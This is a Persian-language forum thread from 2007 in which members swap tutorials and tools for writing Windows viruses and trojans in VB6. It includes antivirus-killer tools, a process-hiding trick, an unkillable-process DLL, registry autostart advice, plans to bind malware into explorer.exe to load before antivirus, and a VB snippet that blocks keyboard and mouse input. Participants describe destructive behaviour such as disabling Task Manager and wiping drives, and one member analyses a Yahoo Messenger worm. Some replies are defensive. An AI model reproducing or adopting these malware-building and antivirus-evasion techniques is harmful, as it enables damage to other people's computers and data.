PDA

نسخه کامل مشاهده نسخه کامل : ويروس نويسي و انتي ويروس نويسي

shirazhaker
18-02-2007, 23:35
:evil: در اين تاپيك فقط راجع به ويروس نويسي با وي بي صحبت مي كنيم :evil:

"""""""_____استعداد هاي خود را نمايان سازيد_____"""""""""
بعضي از برنامه نويسان استعداد يا علاقه ي زيادي به ويروس و انتي ويروس علاقه دارند پس در اين تاپيك بحث ميكنيم

"""""""نكته : فقط كساني كه از خلاقيت و استعداد برخور دارن مي توانند ويروس بنويسند """""""""
پس با استعداداش بيا جلو بگن چقر وي بي بلده

((((مسوليت دانلود از اين تاپيك به عهده ي كاربر هست و ما هيچ مسوليتي نداري)))))

:evil: :evil: :evil: :evil: :evil: :evil: :evil: :evil: :evil: :evil: :evil: :evil: :evil: :evil: :evil: :evil: :evil: :evil: :evil:

shirazhaker
19-02-2007, 18:01
اين بخش اول ويروس نويسي هست كه به صورت پي دي اف هست كه مال دوست خوبم elfy است

دانلود ([ برای مشاهده لینک ، لطفا با نام کاربری خود وارد شوید یا ثبت نام کنید ])

shirazhaker
19-02-2007, 18:10
اين بخش دوم ويروس نويسي هست كه به صورت پي دي اف هست اين پي دي اف هاغ ترفند هاي وي بي هستند و همان تور كه كفتم ويروس نويسي احتياج به استعداد داره

دانلود ([ برای مشاهده لینک ، لطفا با نام کاربری خود وارد شوید یا ثبت نام کنید ])

shirazhaker
19-02-2007, 18:13
اين بخش سوم و اخر اين پدي اف ها هست اميد وارم كه مفيد بوده باشه شما هم در اين بحث شركت كنيد

shirazhaker
19-02-2007, 18:16
اينم اموزش تروجان نويسي كه به نوبه خود تركونده .نظر بدين

jefri_btc
20-02-2007, 12:18
bakhsh 3 mige file kharab hast va baz nemisheeee

BabyBoy
20-02-2007, 17:06
این دستور تحت Dos اطلاعات درایوها را بدون هیچ پرسشی و خیلی سریع پاک میکنه ((حتی درایوی که ویندوز توش نصبه )) :blink:

برای مشاهده محتوا ، لطفا وارد شوید یا ثبت نام کنید
:evil:
چند تا برنامه هم نوشتم به محض این که آپلود کنم میزارم
امیدوارم تاپیکه خوبی بشه

shirazhaker
21-02-2007, 22:56
لطفا نوع ويروس و قدر تخريب رو هم بنويسيد تا افراد ناوارد دچار مشكل نشوند

shirazhaker
21-02-2007, 23:00
بخش 3 تصحيح شد . BabyBoy جان نوع ويروس وكاري كه ميكنه رو بنويسيد و بگيد كه چتور كار ميكنه . چون اين پست اموزشي و ممكن كسي سر درنياره

sa3er
21-02-2007, 23:57
تاپیک اصلاح شد

دوستان عزیز،
لطفا اینجا فایلهای آلوده قرار ندید. فقط کد رد و بدل بشه و بیشتر جهت بحث رو به سمت آنتی ویروس ببرید تا در چهارچوب قوانین جایگاه علمی تاپیک حفظ شود.

جهت قرار دادن کدها اونها رو با استفاده از دکمه # [ برای مشاهده لینک ، لطفا با نام کاربری خود وارد شوید یا ثبت نام کنید ] داخل تگ [ c o d e ] قرار بدید. جهت اطلاعات بیشتر به announcement ([ برای مشاهده لینک ، لطفا با نام کاربری خود وارد شوید یا ثبت نام کنید ]) انجمنهای برنامه نویسی مراجعه کنید.

shirazhaker
22-02-2007, 00:12
خيلي سخت گير هستيد خوب هر كي ميتر سه الوده بشه نياد تو و مقدمه هر انتي ويروسي خود ويروس من ميخواستم انو فردا بزارم ولي حالا

"""""لطفا كساني كه در اين تاپيك ويروسي را ارائه ميكنند انتي يا پاك كننده اون ويروس رو هم بزارن""""""""""
((((((و به توصيه مقامات بالا بيشتر مقاله ومطلب بزاريد تا تاپيك بسته نشه)))))))

BabyBoy
22-02-2007, 19:14
shirazhaker لطفا نوع ويروس و قدر تخريب رو هم بنويسيد تا افراد ناوارد دچار مشكل نشوند

اين برنامه از خودش توي درايوي كه هست با سرعت زيد كپي مي كنه
Task manager وsystem restore از كار ميندازه
هر 10 دقيقه كامپيوتر رو restart مي كنه
تو رجيستري تعريف ميشه كه با windows بالا بياد
البته اگه يزه زحمت بكشيد خودتون كلي چيز ميتونيد بهش اضافه كنيد
راستي نظر هم بديد

ehsan30
22-02-2007, 21:34
سلام
دستت درد نکن ببینم فایل های pdf هم آلوده هستند؟؟؟ در ضمن کتاب شماره 3 هم
وقتی دانلود میشه حجمش 6 کیلو بایته و باز هم نمی شه.
باز هم ممنون
بای

shirazhaker
23-02-2007, 12:01
اينم بخش 3 كه دوباره اپ كردم و حجمش هم 64 كيلوبايت و pdf ها هم الوده نيستند

shirazhaker
24-02-2007, 00:48
اينم انتي ويروس Brontok ( همون new folder خودمون كه همه جا فراونه )

shirazhaker
24-02-2007, 00:50
اينم واسه ويروس نويس هاي گل برنامه nod32 را از كار ميندازه

shirazhaker
24-02-2007, 00:53
اين يك ترفند واسه اينكه ويروس شما هيجا ثبت نشه( hide process ) هست كه بدرد همه ميخوره

shirazhaker
24-02-2007, 01:00
اينيكي McAfee-Killer هستش كه كارشو خودتون بلديد .
اگر نظر ندين و در بحث شركت نكنيد تاپيك از كار ميفته

BabyBoy
03-03-2007, 11:39
بابا برنامه نويسا...............
كجاييد پس؟ :blink:
نزاريد تاپيك بخابه...

shirazhaker
04-03-2007, 01:05
كسي اينجا مال اين حرفا نيست

h-proxy
18-03-2007, 15:52
کده یه ویروس که اگه اجرا بشه خدا می دونه چه بلایی سرت میاره مجبورت میکنه هی ویندوز عوض کنی تا هارد ت بسوزه...فقط نیاز به تایمر دارید...با Interval=1
:31:

h-proxy
19-03-2007, 06:12
برای ساخت تروجان مانند مجیک یا ساب سون:
کد کلاینت یعنی شما حرفه ای ها میدونن چه چیزایی نیاز داره

این هم کد سرور یعنی فایلی که نماینده شما است در رایانه قربانی

mazi_z_PSP
19-03-2007, 12:56
salam man ye barnameye ---- baraye Win XP neveshtam ke jalebe hatman downloadkonin ba nazar bedin ... aval Keyboard va mouse az kar miyoftan vali baad az modati dorost mishe ....nazar bedina

in linko mitoonin too tapike man moshahede konin :mazi_z_MCSD

mazi_z_PSP
19-03-2007, 12:57
be mazi_z_MCSD morajee konin

Alireza_Shafaei_PCworld
19-03-2007, 14:17
فکر کنم محتویات این تاپیک بتون کمک کنه!

[ برای مشاهده لینک ، لطفا با نام کاربری خود وارد شوید یا ثبت نام کنید ]

shirazhaker
19-03-2007, 16:22
مرسي از h_proxy خواهش ميكنم ادامه بديد عالي

shirazhaker
19-03-2007, 16:23
از Alireza_Shafaei_PCworld هم بخاطر تاپيك عاليشان ممنون

Oracle_Eldorado
19-03-2007, 16:38
bakhsh 3 mige file kharab hast va baz nemisheeee
درسته . خرابه .
خوب دوست عزیز . کار جالبیه . ولی قبل از هر چیزی باید آموزش آنتی ویروس رو میزاشتی . چون اول پیشگیری بعد مقابله !

shirazhaker لطفا نوع ويروس و قدر تخريب رو هم بنويسيد تا افراد ناوارد دچار مشكل نشوند

اين برنامه از خودش توي درايوي كه هست با سرعت زيد كپي مي كنه
Task manager وsystem restore از كار ميندازه
هر 10 دقيقه كامپيوتر رو restart مي كنه
تو رجيستري تعريف ميشه كه با windows بالا بياد
البته اگه يزه زحمت بكشيد خودتون كلي چيز ميتونيد بهش اضافه كنيد
راستي نظر هم بديد

این هم حرف درستی بود .
راستی ویروس ها رو باید RAR میکردی که آزاد نباشند .
چطور کسی مال این حرفا نیست . یه ویروس خودم نوشتم که همون ابتدای بالا آمدن ویندوز وقتی که سیستم مشخصات رو شناسایی میکنه ( 2 ثانیه بعد شنیدن صدای بوق ) Restart میشه !
مازی جان لطف کن فارسی بنویس .

shirazhaker
19-03-2007, 17:01
ok پس چرا زودتر شركت نكردي حالا هم دير نيست

اگر برات ممكن بيشتر توضيح بده

shirazhaker
19-03-2007, 17:03
در ضمن h_proxy جان اينهايي كه نوشتي برنامه هاي كنترل از راه دور هست و با ويروس نويسي فرق داره
ويروس هميشه اتوماتيك عمل ميكنه

Mehrdad_Desiner
23-03-2007, 00:14
این دستور تحت Dos اطلاعات درایوها را بدون هیچ پرسشی و خیلی سریع پاک میکنه ((حتی درایوی که ویندوز توش نصبه )) :blink:

:evil:
چند تا برنامه هم نوشتم به محض این که آپلود کنم میزارم
امیدوارم تاپیکه خوبی بشه

سلام
آيا ميشه اين دستور رو يه فايل اجرايي كرد چجوري ؟
من اگه فقط بخوام درايو D و E طرف پاك شه بايد چي كار كنم ؟

mazi_z_PSP
25-03-2007, 09:55
bebakhshid oracle jan man nemitoonam farsi benevisma chon faghat Windows vista ro daram va oon ham farsi nadare

sa3er
25-03-2007, 11:11
bebakhshid oracle jan man nemitoonam farsi benevisma chon faghat Windows vista ro daram va oon ham farsi nadare

En2Fa :: Finglish to Farsi Translator

mazi_z_PSP
25-03-2007, 13:15
salam Babyboy jan ...man in code ro tabdil be ye barnameye ejraii ba VB kardam ama emtehanesh natoonestam bokonam chon tarsidam computere khodam kharab beshe mishe begii chetor mitoonam emtehan konam???

inam codhaye ye barnameye ---- alabate az rahe door na baraye winXP ke be saligheye khodetoon mitooni ye barnameye ejraii besazid ba ye Interface ghashangB
#
Private Declare Function BlockInput Lib "user32" (ByVal fBlock As Long) As Byte]
Private Declare Sub Sleep Lib "kernel32" (ByVal dwMilliseconds As Long)

Private Sub Form_Activate()
DoEvents
BlockInput True 'True=1
Sleep 10000
BlockInput False 'False=0
[End Sub

#

mazi_z_PSP
25-03-2007, 13:37
سلا م اقا يه سا سر از این برنمه ایی که مو رفی کرديد ممنونم

mazi_z_PSP
26-03-2007, 21:57
از آقا يه h_proxy ممنونم به خاتره اون ويروسشون اما من Compile کردنش مشکل دارم ميشه رهانمييم کنيد؟

با سلام خدمته آقا Shirazhacker .اميدورام خوب باشيد..اين فايل پ د ف رو که گزاشتين خيلي باهله اما من در بزي از جاهاش به مشکل بر خو ردم .يک سو'ال : 1.من با Compile مشکل دارم که نمي شه.2.اگر بخام امتهانش کنم رو سيستم خودم چجوري ميشه جو لو شو گرفت که آسيبي نرسونه؟ (Virus 1 learn 1)

در ضمن پ د ف سوم خرب بود

با سلام خدمته اقايه shirazhaker و h-proxy . در مورده برناميی که اقايه shirazhaker قسمته اول من موقه Compile کردنش با پيغامه Compile error: Variable not defined مواجه می شم. و در مورده ويروسی که اقايه h-proxy داده بودن . که موقه Compile کردنش با پيغامه Compile error : variable not defined مواجه می شم.. لتف کنين راهنماييم کنيد.!!

mazi_z_PSP
26-03-2007, 23:18
کده یه ویروس که اگه اجرا بشه خدا می دونه چه بلایی سرت میاره مجبورت میکنه هی ویندوز عوض کنی تا هارد ت بسوزه...فقط نیاز به تایمر دارید...با Interval=1
:31:

با سلام خدمته اقايه shirazhaker و h-proxy . در مورده برناميی که اقايه shirazhaker قسمته اول من موقه Compile کردنش با پيغامه Compile error: Variable not defined مواجه می شم. و در مورده ويروسی که اقايه h-proxy داده بودن . که موقه Compile کردنش با پيغامه Compile error : variable not defined مواجه می شم.. لتف کنين راهنماييم کنيد.!!

mazi_z_PSP
26-03-2007, 23:19
اين بخش اول ويروس نويسي هست كه به صورت پي دي اف هست كه مال دوست خوبم elfy است

Alireza_Shafaei_PCworld
27-03-2007, 13:22
درسته . خرابه .
خوب دوست عزیز . کار جالبیه . ولی قبل از هر چیزی باید آموزش آنتی ویروس رو میزاشتی . چون اول پیشگیری بعد مقابله !

این هم حرف درستی بود .
راستی ویروس ها رو باید RAR میکردی که آزاد نباشند .
چطور کسی مال این حرفا نیست . یه ویروس خودم نوشتم که همون ابتدای بالا آمدن ویندوز وقتی که سیستم مشخصات رو شناسایی میکنه ( 2 ثانیه بعد شنیدن صدای بوق ) Restart میشه !
مازی جان لطف کن فارسی بنویس .

با نوشتن یک فرمان کوچک روی MBR میشه این کار را کرد
ولی باید بدونی پاک کردن این ویروس خیلی راحته!

از آنجایی کار به این راحتی ها نیست (و به فرض محال که شما این ویروس را نوشتین) با پاک کردن چند فایل ویندوز
هم میشه این کار را کرد (که احتمالا شما با این روش وارد شدین(طبق فرض))

کار سخت تری هم هست که ویروس را Service تعریف کنی!
بقیه اش با شما!

shirazhaker
28-03-2007, 02:06
جناب Alireza_Shafaei_PCworld اگر ميشه راجب اينكه چطوري يك سرويس تعريف كنيم توزيح بدين
از mazi_z_MCSD هم معذرت ميخوام چند روز نبودم شما روي سيستم خودت انتي ويروس داري .
احتمالا چند روز اينده هم نباشم تا 12 فروردين سوال هايي كه بصورت پيام برام مياد را روز 13 جواب خواهم داد

mazi_z_PSP
29-03-2007, 22:09
سلام ممنون از اينکه جواب دادين. رو سيستمم ويستا نصب هست و همونطور که مي دونين روش Anti Virus هست ولي نميشه روش Anti Virus ديگه اي نصب کرد. حالا جوابه سوالايه قبليمو بدين

سلام اقايه Alireza_shafaei_PCworld من ميخام تو برنامه نويسی پيشرفت کنم البته تا حالا پيشرفته زيادی کردم اما کافی نيست .. ميشه از شما کمک بگيرم؟ ميشه id بدين؟

به تاپيک هايه من برايه بحث دباره ويروس نويسی مراجه کنيد

double_n
29-03-2007, 22:47

پیغام دقیقا منظورش معلومه که چیه، شما از متغیرها توی این قطعه کد استفاده کردید ولی اونا رو برای کامپایلر تعریف نکردید که توی رم براشون حافظه کنار بذاره .
متغیرها رو تعریف کن براش درست میشه. :5: :46:

باید بگم که از صفحه اول تا اینجا مطالبی رو که نوشتید خوندم، ولی اگه اینطوری ادامه بدید به جایی نخواهید رسید و فقط وقتتون رو تلف می کنید.:27:

موفق و سربلند باشید.
ارادتمند دوستداران دوست
DevilHell

mazi_z_PSP
30-03-2007, 09:31
پیغام دقیقا منظورش معلومه که چیه، شما از متغیرها توی این قطعه کد استفاده کردید ولی اونا رو برای کامپایلر تعریف نکردید که توی رم براشون حافظه کنار بذاره .
متغیرها رو تعریف کن براش درست میشه. :5: :46:

باید بگم که از صفحه اول تا اینجا مطالبی رو که نوشتید خوندم، ولی اگه اینطوری ادامه بدید به جایی نخواهید رسید و فقط وقتتون رو تلف می کنید.:27:

موفق و سربلند باشید.
ارادتمند دوستداران دوست
DevilHell

ممنونم آقايه double_n از اینکه جواب دادين. من هنوز زياد تو برنامه نويسی حرفه ای نشدم ميشه کمی بيشتر کمکم کنيد؟

mazi_z_PSP
30-03-2007, 09:33
از آقايه double_n خواهش ميکنم که به این تاپيک و تاپيکه من کمی رونق بدن

متالیک
30-03-2007, 10:50
سلام دوستان عزیز

من احساس کردم چند روزی هست که کامپیوترم ویروسی شده ولی من هنوز بعد از چند سال یک آنتی ویزوس توی کامپیوترم ندارم. چون دزد که از دزد بزنه شاه دزده!!! در نتیجه ریشه یابی کردم و ویروسه رو پیداش کردم، اینم کدش:

چندتا سوال داشتم:
1. این ویروس دقیقا چه کار می کنه؟ تا اونجایی که من فهمیدم فقط به مسنجر یاهو کار داره و آی دی ها رو برمی داره و یک لینک به بقیه ارسال می کنه، اگه می شه کامل توصیح بدید
2. چه جوری میشه این ویروس رو کامل از بین برد؟ چون من این فایل و فایل هایی که در سورس برنامه اومده رو حذف کردم ولی هنوز کامپیوترم می لنگه
3. من دیگه سرم به سنگ خورده، چه آنتی ویروسی نصب کنم که اولا به روز باشه، ثانیا سرعت کامپیوتر رو کم نکنه؟ چون من پاندا که نصب می کنم حال سرعت کامپیوتر رو می گیره، مک آفی هم که همش پیام آپدیت می ده

با تشکر
موفق باشید

متالیک
30-03-2007, 10:50
سلام دوستان عزیز

من احساس کردم چند روزی هست که کامپیوترم ویروسی شده ولی من هنوز بعد از چند سال یک آنتی ویزوس توی کامپیوترم ندارم. چون دزد که از دزد بزنه شاه دزده!!! در نتیجه ریشه یابی کردم و ویروسه رو پیداش کردم، اینم کدش:

چندتا سوال داشتم:
1. این ویروس دقیقا چه کار می کنه؟ تا اونجایی که من فهمیدم فقط به مسنجر یاهو کار داره و آی دی ها رو برمی داره و یک لینک به بقیه ارسال می کنه، اگه می شه کامل توصیح بدید
2. چه جوری میشه این ویروس رو کامل از بین برد؟ چون من این فایل و فایل هایی که در سورس برنامه اومده رو حذف کردم ولی هنوز کامپیوترم می لنگه
3. من دیگه سرم به سنگ خورده، چه آنتی ویروسی نصب کنم که اولا به روز باشه، ثانیا سرعت کامپیوتر رو کم نکنه؟ چون من پاندا که نصب می کنم حال سرعت کامپیوتر رو می گیره، مک آفی هم که همش پیام آپدیت می ده
4. در ضمن لینک دانلود فایل های آموزشی 1 تا 3 خراب هستند و دانلود نمی شن...

با تشکر
موفق باشید

yasdesign
30-03-2007, 13:08
سلام. من یه کدی میخواستم مثل بالایی که وقتی یاهو مسنجر باز میشه برای تمامی ادد لیستها یه پیام بفرسته.. اگه میشه با توضیحش اینجا بزارید ممنون میشم. خیلی سریع لطفا.

double_n
30-03-2007, 13:11
جئاب سوالات رو یکی یک میدم.
جواب سوال اولت: به این نمیشه دقیقا گفت ویروس ولی این قطعه کد که اینجا گذاشتین یکی از کارهاش اینه که برای دیگران یه پیام تبلیغی میفرسته که بهتون توصیه میکنم نبینیدش بهتره ولی به اینجا لینک میده girlsex.webs.io/picture.htm البته از طرف شما، که دوستان دیگه تون هم با باز کردن صفحه ذکر شده همین بلا سرشون میاد.
البته این پیام رو بصورت ایمیل ارسال میکنه و موضوع رو Hello و متن ایمیل هم این خواهد بود :
Go to my sait: [ برای مشاهده لینک ، لطفا با نام کاربری خود وارد شوید یا ثبت نام کنید ]

لیست اشخاصی که ایمیل رو براشون میفرسته رو هم از این شاخه پیدا میکنه :
YAHOO!\MESSENGER\PROFILES

جوابت سوال دومت:
فایلهایی که این ویروس استفاده می کنه اینا هستن :
Kernel.vbs و Kernel.exe و TSP32E.DLL و TSP32V.DLL و Systemv.dll و ... که میتونی توی سورس پیدا کنی
حتما از توی رجیستری اونا رو حذف کن

جواب سوال سومت به انجمنهای مربوطه به آنتی ویروسهای مراجعه کن، حتما به جوابت می رسی

سوال چهارمت رو هم من تست نکردم
دوستان دیگه باید جواب بدن

yasdesign
30-03-2007, 22:46
مرسی که زحمت بسیار کشیده اید فقط یه نکته!

میشه سورس کامل این به اصطلاح ویروس تبلیغاتی رو بزارید. البته اگر زحمتی نیست برای شما، اگر توضیح هم داشت بهتر.
با تشکر از زحمت هایتان.

:20: :20: :20: :20: :20:

Alireza_Shafaei_PCworld
30-03-2007, 22:50
برای تعریف سرویس باید وارد Ring 0 بشی
باید برنامه نویسی Device انجام بدی

میتونی هم جای بقیه اعضای Services در رجیستری قرار بگیری

Morteza_SOS
31-03-2007, 14:47
به نام خدا
با سلام لطفا اگر ممکن است آموزش ساخت ویروس در دلفی را بدهید .

به نام خدا
همینطور آنتی ویروس

mazi_z_PSP
31-03-2007, 21:15
سلام آقايه متاليک. من با این نوع ويروس آشنا نيستم اما بهتون توصيه ميکنم از Bitdefender10 AntiVirus استفاده کنين. McAfee که زيادی سنگينه و Panda هم به درد نميخوره.. بهترين AntiVirus فلن BitDefender هست

yasdesign
01-04-2007, 12:12
برای تعریف سرویس باید وارد Ring 0 بشی
باید برنامه نویسی Device انجام بدی

میتونی هم جای بقیه اعضای Services در رجیستری قرار بگیری

خیلی ببخشید ولی من چیزی نگرفتم،اگه میشه بیشتر توضیح بدید. اخه من تازه کارم

double_n
01-04-2007, 14:12
خدمت دوستان عرض کنم که قدرتمند ترین ویروسها با سی و اسمبلی ساخته میشن.

بای.

shirazhaker
01-04-2007, 21:59
سلام من برگشتم
اشتباه ميكنسد نرمترين زبان براي ويروس نويسي و انتي ويروس نويسي حتي تا الان وي بي 6 است

Alireza_Shafaei_PCworld
01-04-2007, 22:13
سلام من برگشتم
اشتباه ميكنسد نرمترين زبان براي ويروس نويسي و انتي ويروس نويسي حتي تا الان وي بي 6 است

اینکه برترین زبان اسمبلیه که توش حرفی نیست
ولی باید بدونید قوی ترین هم هست
میدونی که اگر اسمبلی نبود VB و ... ها هم نبودن؟
نرمترین زبان هم Delphi!

BabyBoy
02-04-2007, 20:34
به نظر من هم براي ساختن ويروس توي ويندوز، vb خيلي ساده تره :8:

shamsoft
02-04-2007, 22:33
تو قوی بودن اسمبلی که شکی نیست چون هر چی باشه زبان سطح پایین هست و می تونه مستقیم با سخت افزار ارتباط برقرار کنه و به حافظه هم که دیگه دسترسی کامل داره. خفن ترین ویروس ها با این زبان نوشته میشن و ویروسهای سخت افزاری هم از شاهکارهای همین زبونه. البته من شنیدم که یه نفر با وی بی 6 واسه سخت افزار هم ویروس نوشته ولی خب فکر نکنم حقیقت داشته باشه
وی بی 6 هم واسه بچه ویروس نویسی خوبه. یه چیزی که نهایتش طرف رو مجبور به تعویض ویندوز کنه یا هاردش رو پر کنه یا پاک کنه و از این چرت و پرتا. ولی خب اگه فکر خوبی داشته باشی با وی بی 6 هم می تونی چیزای جالبی بنویسی. بیشتر قدرت برنامه توسط برنامه نویس تعیین میشه خودت برنامه نویس خوبی باید باشی

shirazhaker
03-04-2007, 01:23
لازم به ذكر است كه ما ويروس سخت افزاري نميخواهيم
ويروس new folder و folder option با وي بي 6 ساخته شده است

متالیک
03-04-2007, 08:10
سلام آقايه متاليک. من با این نوع ويروس آشنا نيستم اما بهتون توصيه ميکنم از Bitdefender10 AntiVirus استفاده کنين. McAfee که زيادی سنگينه و Panda هم به درد نميخوره.. بهترين AntiVirus فلن BitDefender هست

سلام دوست عزیز آقای mazi_z_MCSD

خیلی ممنون، برنامه ی کامل و جالب بود. فقط یک نکته من وقتی سریال برنامه رو وارد می کنم بعد که به اینترنت وصل می شم برنامه غیر فعال می شه و می گه سریال ورودی شما غیر معتبر است. ببینید این چنین مشکلی برای من برای برنامه های Internet download manger 10 و bablyon 6 هم به وجود اومده. فکر می کنم وقتی به اینترنت وصل می شم این برنامه ها به طور مخفی سریال کرک شده رو چک می کنن. چه جوری می شه این برنامه ها رو درست کرد؟

با تشکر

mazi_z_PSP
03-04-2007, 10:30
سلام متاليک جان . این مشکل برايه همه ایرانيها هستش. ما که Copyright نداريم!!! تو بايد از اخرين Version این برنامه ها استفاده کنی. البته اگر Vista داشته باشی این مشکل کمتر پيش می ياد . البته رو Antivirus Vista نصب نميشه

دوستانه محترم ما نيامديم اینجا در مورده زبان هايه برنامه نويسی صحبت کنيم. آمديم درباره برنامه نويسی در VB صحبت کنيم تا بتونيم کمی در جهان Hacker ha حرفی برايه گفتن داشته باشيم

هرکی حرفی برايه گفتن در مورد زبان هايه برنامه نويسی داره ميتونه يه تاپيک با عنوان : بحث در مورد زبان هايه برنامه نويسی.. ایجاد کنه

من از آقايه .... و .... خواهش ميکنم که هرچه سريع تر به این تاپيک رونق بدن. و از مديران محترم هم خواهش ميکنم که این تاپيک رو قفل نکنن

من از آقايه shirazhaker و oracle_eldorado خواهش ميکنم که هرچه سريع تر به این تاپيک رونق بدن. و از مديران محترم هم خواهش ميکنم که این تاپيک رو قفل نکنن

من از آقايه shirazhaker و oracle_eldorado خواهش ميکنم که هرچه سريع تر به این تاپيک رونق بدن. و از مديران محترم هم خواهش ميکنم که این تاپيک رو قفل نکنن

shirazhaker
11-04-2007, 04:16
((((((((((((((((______---------________يك اميد تازه به همه__________------------)))))))))))))))))))))))
اينجا جايي فقط براي حرفه اي ها و سرس گزاشتن نيست بياييم از فكر خود استفاده كنيم
طرح هاي خود را درضمينه ويروس نويسي بگيد .كاري به برنامه نويسي نداشته باشيد (ما سعي ميكنسم با كمك دوستان اونو تو وي بي پياده كنيم )

اولين طرح رو خودم ميدم كه اگه كسي پياده سازيش كنه عالي هست
bind و unbind
bind::::
ميخوام برنامه خودم رو به يك فايل اگزه بچسبونم .مثلا explorer.exe كه اگه اين اتفاق بيوفته برنامه من همراه با وليكام ويندوز بالا مياد قبل از هر انتي ويروسي كه روي سيستم هست
unbind:::::
چون ما انتي ويروس رو هم نياز داريم بايت روشي هم براي پاك كردن يا غيره فعال كردن اين كار داشته باشيم
-------------------------------------------------------------------------------------------------------------------
همينجا از همه دوستان تشكر ميكنم .اين بهترين روش براي ساخت ويروس هست.تبادل افكار.
---------------------------------------------------------------------------------------------------------------------
يك خبر بزودي كتاب كاملي در باره هك و امنيت ميزارم كه مال انتشارات زرين كتاب است

shirazhaker
11-04-2007, 04:31
اينم يك دلل جديد كه باعث ميسه پروسس برنامه شما مهم شود و برنامه شما به هيچ عنوان end tesk و end process نشود اين يك امكان فوقالعاده است
لينك دانلود ([ برای مشاهده لینک ، لطفا با نام کاربری خود وارد شوید یا ثبت نام کنید ])
نمونه ديگر از اين برنامه در تاپيك زير
اينم كتابي كه قولشو داده بودم
لينك دانلود ([ برای مشاهده لینک ، لطفا با نام کاربری خود وارد شوید یا ثبت نام کنید ])
پسوردش هم :[ برای مشاهده لینک ، لطفا با نام کاربری خود وارد شوید یا ثبت نام کنید ]

mazi_z_PSP
11-04-2007, 09:02
خيلی ممنون shirazhaker جان از مقالاتت. من هم با نظرت موافقم .

ببخشيد پسورد این برنامه رو دقيقا چجوری ميشه گرفت

Romina2006
11-04-2007, 12:41
shirazhaker جان

فکر کنم این همون برنامه ای است که در تاپیک زیر گذاشتم ولی بازهم می توان برنامه را end process کرد

درسته که اون برنامه دیگر اسم برنامه موردنظرتان را از لیست پروسسها مخفی می کند ولی بازهم می توان آنرا end process کرد.

البته end process برنامه ها برای کاربران حرفه ای کاری ندارد.

shirazhaker
11-04-2007, 13:32
ولي اينيكه من گزاشتم كار يك dll هست به نامه StickyApp32 شما process راميبينيد ولي نمي ان را end process
مگر با خود وي بي با دستور
Shell "taskkill /f /im yourprogram.exe", vbHide""

موفق باشيد
اون كتابي كه گزاشتم رو بخونيد عالي هست

منتظر طرح هاي شما هستيم

درسته که اون برنامه دیگر اسم برنامه موردنظرتان را از لیست پروسسها مخفی می کند ولی بازهم می توان آنرا end process کرد.

البته end process برنامه ها برای کاربران حرفه ای کاری ندارد.
همه كه حرفه نيستن اونايي كه حرفه هستن سريع انتي رو پيدا مي كنند

Oracle_Eldorado
11-04-2007, 13:57
خوب اینجا به من چه احتیاجی بود که پیغام خصوصی زدید ؟
ماشالا همگی هکر هستید !

BabyBoy
11-04-2007, 20:06
shirazhacker
ميخوام برنامه خودم رو به يك فايل اگزه بچسبونم .مثلا explorer.exe كه اگه اين اتفاق بيوفته برنامه من همراه با وليكام ويندوز بالا مياد قبل از هر انتي ويروسي كه روي سيستم هست
__________________________________________________ __________________________________
براي اين كار بايد تو رجيستري يك كليد درست كني و مقدارشو آدرس فايلتو بدي
اين برنامه رو نگاه كني كاملا متوجه ميشي
Download ([ برای مشاهده لینک ، لطفا با نام کاربری خود وارد شوید یا ثبت نام کنید ])
.................................................. ...........

در مورد از كار انداختن آنتي ويروس ها بايد بگم كه هم ميتوني كليدشون رو از تو رجيستري پاك كني (از همون آدرسي كه تو برنامه گذاشتم) وهم ميتوني از برنامه هاي زير استفاده كني
AntiBrontok ([ برای مشاهده لینک ، لطفا با نام کاربری خود وارد شوید یا ثبت نام کنید ])
AntiNod32 ([ برای مشاهده لینک ، لطفا با نام کاربری خود وارد شوید یا ثبت نام کنید ])
McAfee-Killer ([ برای مشاهده لینک ، لطفا با نام کاربری خود وارد شوید یا ثبت نام کنید ])
:8:

Romina2006
11-04-2007, 20:24
ولي اينيكه من گزاشتم كار يك dll هست به نامه StickyApp32 شما process راميبينيد ولي نمي ان را end process
مگر با خود وي بي با دستور
Shell "taskkill /f /im yourprogram.exe", vbHide""

دوست عزیز درسته که با اون دستور می تونی برنامه موردنظرت را end process کنی ولی با اون دستور نمی تونی اون برنامه را end process کنی

shirazhaker
12-04-2007, 02:28
خوب اینجا به من چه احتیاجی بود که پیغام خصوصی زدید ؟
ماشالا همگی هکر هستید !
اول هكر نه ويروس نويس دووم من كه تو نامه گفتم شما گفتيد كه يك ويروس نوشتيد كه بعد از شنيدن صداي بوق كيس اون رسيت ميشه .توضيح لطفا
-----------------------------------------------------------------------------------------------------------------------------

براي اين كار بايد تو رجيستري يك كليد درست كني و مقدارشو آدرس فايلتو بدي
اين برنامه رو نگاه كني كاملا متوجه ميشي
Download
.................................................. ...........

در مورد از كار انداختن آنتي ويروس ها بايد بگم كه هم ميتوني كليدشون رو از تو رجيستري پاك كني (از همون آدرسي كه تو برنامه گذاشتم) وهم ميتوني از برنامه هاي زير استفاده كني
AntiBrontok
AntiNod32
McAfee-Killer
شما معني bind را نفهميديد
يعني برنامه خود را به برنامه expelore.exe بچسبانيم كه همراه ويندوز بيام بالا.اين يك خاصيت مهم داره اينكه اسم برنامه درحال اجراي شما هيچ جا ثپت نميشه
دوم در باره رجيستري اين روش شما راحت ترين و قابل ديد ترين حالت برنامه در استارت اپ هست ماداريم راجع به ويروس حرف ميزنيم هيچ كس نبايد متوجه برنامه ما بشود حتي حرفه اي ها
در باره اينكه قبل از انتي ويروس بيا بالا لازم ب ذكر است كه اگر برنامه شما بعد از انتي ويرس بالا بيايد انتي ويروس برنامه شما را يك ويروس شناخته و اجرا نمي كند پس شما چهطو ميخواهيد برنامه انتي ويروس رو ببنديد
(درمورد bind چند اموزش دارم كه تا فردا حتما خوام گزاشت)
(در ضمن اون فايل هايي كه گزاشتي رو روز اول من خودم گزاشتم صفحه اول)
------------------------------------------------------------------------------------------------------------

دوست عزیز درسته که با اون دستور می تونی برنامه موردنظرت را end process کنی ولی با اون دستور نمی تونی اون برنامه را end process کنی
من چيزي نفهميدم لطفا توضيح بيشتر .البته در پيغام چون اينجا داره علكي شلوغ ميشه.

خيلي زيا حرف زدم لطفا منو ببخشيد

mazi_z_PSP
14-04-2007, 09:51
دسته همه دوستان درد نکنه که تمامه این مدت من این تاپيک رو نگه داشتم. خيلی ممنون که به حرفام توجه کردين. ميشه بگی پسورد اون کتاب رو چجوری ميشه از اون سايت شلوق گرفت؟

Romina2006
14-04-2007, 18:49
ميشه بگی پسورد اون کتاب رو چجوری ميشه از اون سايت شلوق گرفت؟

پسوردش [ برای مشاهده لینک ، لطفا با نام کاربری خود وارد شوید یا ثبت نام کنید ] است فقط کافیه عبارت رو تایپ کنی

shirazhaker
